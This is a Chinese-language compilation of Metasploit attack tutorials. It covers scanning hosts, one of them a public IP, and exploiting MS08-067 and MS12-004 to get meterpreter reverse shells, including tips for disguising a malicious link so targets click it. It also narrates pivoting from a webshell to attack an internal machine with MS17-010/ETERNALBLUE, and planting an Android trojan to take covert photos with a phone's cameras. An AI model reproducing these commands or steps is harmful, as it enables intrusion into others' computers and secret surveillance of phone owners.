⑴ 如何用Metasploit掃描埠
一、調用Nmap進行掃描
進入msf命令行後直接輸入nmap –v –sVip(具體命令和nmap一樣)
二、MSF模塊掃描
Use auxiliary/scanner/postscan/syn
先用搜索命令搜索有關埠掃描的工具:searchportscan
我們使用Use auxiliary/scanner/postscan/syn
看一下參數配置 showoptions
我們先來設置一下網卡
Set INTERFACE eth0
設置一下掃描的埠,我們這里來掃描80:set PORTS 80
設置掃描目標RHOSTS :set RHOSTS 119.63.37.149
在設置一下線程:set THREADS 100
看一下我們設置好的
這時候我們都設置好了,我們來攻擊下,看看效果,用命令run進行攻擊
缺點就是掃描的速度有點慢啊
MetaSploit SMB掃描獲取系統信息
還是搜索一下smb:searchsmb
這次發現搜出來很多,我們用這個模塊
Use auxiliary/scanner/smb/smb_version
看一下需要設置的參數
設定目標ip:set RHOSTS 192.168.188.140
在設置一下線程:set THREAD 10
然後run一下,查看結果
直接掃描出來小夥伴的系統還有主機名,速度不到1s,很快
也可以批量掃描設置批量掃描目標即可 set RHOSTS 192.168.188.50-200
MetaSploit服務識別
我們這里對SSH和FTP進行識別
在這里使用這個模塊:use auxiliary/scanner/ssh/ssh_version
然後我們設置一下參數,這里講設置好的參數截圖看一下
Run一下看看結果,其實沒有掃出來,好像是屏蔽了,但是用nmap卻掃出來了ssh
在試一下ftp,用這個模塊:use auxiliary/scanner/ftp/ftp_version
設置下參數
可以看到結果,也沒有掃描出來;
MetaSploit SNMP掃描與枚舉
搜索一下snmpuse auxiliary/scanner/snmp/snmp_login
看一下他的參數設置
這個參數還是很多的
設定一下目標
然後在run一下
枚舉用這個模塊
use auxiliary/scanner/snmp/snmp_enum
設置好目標和線程後run一下就可以
MetaSploit遠程代碼執行
搜索一下08-067,使用這個攻擊載荷
use exploit/windows/smb/ms08_067_netapi
同樣來看一下參數設置
我們只要設置一下目標就可以,然後我們需要一個載荷來反彈shell
set payload windows/meterpreter/reverse_tcp
然後設置參數
將LHOST 設置為自己的ip(對外攻擊不要忘了段口轉發)
比如說知道對面的系統是什麼版本,可以指定targer,用target查看一下都有什麼版本
設置一下目標,假設我們目標機器的系統為10:set target 10
這時候,我們再來看一下其參數設置,發現比以前完備了好多
08-067是不會自動識別系統版本的,但是其他的可以自動識別,所以用其他攻擊載荷的時候可以不用設置
然後輸入exploit進行攻擊即可
這時候會出來一個meterpreter>
我們在裡面輸入shell,就會反彈一個shell
這樣整個攻擊過程就完成了
MetaSploit MIDI文件解析遠程代碼執行
還是來搜索12-004
設置下本機ip set SRVHOST ip
然後攻擊
會生成一個連接,但是這個鏈接容易讓人發現,所以我們可以偽裝下ip利用URIPATH參數就可以偽裝
在設置時,會發現報紅,因為4444埠被佔用了,所以我們改下監聽埠 set LPORT 5555
然後生成連接
只要目標點了這個鏈接,那麼我們就會上線一個shell
說一下,目標點擊後我們這邊並沒有反映,我們需要輸下session查看當前會話,會找到上線的機子,連接上線的機子
Session –I 1(id)
然後輸入shell就可以拿到shell
⑵ 利用公網Msf+MS17010跨網段攻擊內網
環境搭建
攻擊機為公網環境下的 Ubuntu 搭配 Metasploit(msf),用於生成木馬和監聽埠。
目標主機為內網中的 Win7,IP 地址為 192.168.1.107,已有與之同一內網的 Win2003 Webshell,IP 為 192.168.1.106。
在公網主機執行 msf,生成 msf 木馬並監聽於 1234 埠。
利用已有 Webshell,上傳並執行生成的 shell.exe 文件,成功獲取目標機內網 192.168.1.106 的 shell。
確定當前路由,添加新路由 192.168.1.0/24 到公網主機,通過該路由訪問內網。
掃描目標主機,發現可用 ms17010 漏洞進行攻擊。
嘗試使用 msf 攻擊模塊進行攻擊,但失敗。
在土司論壇求助未找到解決方法,部分人使用原版 fb.py 成功率較高。
最終在 Win2003 機上,通過以下步驟成功攻擊:
在 Win2003 上安裝 Python 和 pywin32。
將 ETERNALBLUE 目錄及其內容復制到 Win2003 機。
在 Win2003 的 windows 目錄下創建名為 listeningposts 的文件。
在 Win2003 上運行 fb.py,執行相關命令以生成並利用 ms17010 漏洞進行攻擊。
在攻擊機上使用 msf 生成 dll 劫持文件並上傳至目標機。
在 Win2003 機上執行相關命令,msf 中成功反彈 shell。
整個過程中,本地使用 msf 自帶攻擊成功,而遠程 msf 攻擊失敗,有待進一步分析原因。
⑶ msf怎麼遠程監控安卓手機
既然是入侵安卓手機,肯定要先配置一個安卓木馬,那我們看看本機的IP
webcam_snap 隱秘拍照功能
後邊跟上參數-i 指定使用那個攝像頭拍照
可以看見我們分別對前後攝像頭都拍了照 保存到了桌面上
還可以輸入命令webcam_stream 開啟攝像頭